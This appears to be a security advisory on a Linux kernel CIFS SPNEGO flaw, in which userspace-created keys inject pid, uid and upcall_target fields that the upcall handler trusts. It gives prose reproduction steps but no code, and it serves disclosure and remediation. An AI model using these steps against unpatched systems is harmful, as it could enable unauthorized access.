Linux Kernel CIFS SPNEGO Key Description Vulnerability

A vulnerability in the Linux kernel's CIFS (Common Internet File System) implementation allows userspace to create keys that bypass kernel-originating input checks. This is achieved by using the request_key or add_key system calls to inject authority-bearing fields, such as process ID, user ID, and upcall target, into the CIFS SPNEGO key descriptions. The CIFS upcall handler then processes these fields as if they originated from the kernel, potentially leading to unauthorized actions or access.

Impact

Exploitation of this vulnerability could allow userspace applications to manipulate CIFS SPNEGO key descriptions in a way that is not properly vetted by the kernel, potentially leading to unauthorized access or actions within CIFS operations.

Reproduction

The vulnerability can be reproduced by creating a key of type 'cifs.spnego' from userspace using the request_key or add_key system calls. This key can include authority-bearing fields such as pid, uid, creduid, and upcall_target. Once the key is created, CIFS can be instructed to use it, which will trigger the vulnerability by allowing the upcall handler to process the injected fields as if they were kernel-generated.

Remediation

The vulnerability has been addressed in the Linux kernel. Users should upgrade to the latest version where this issue has been fixed.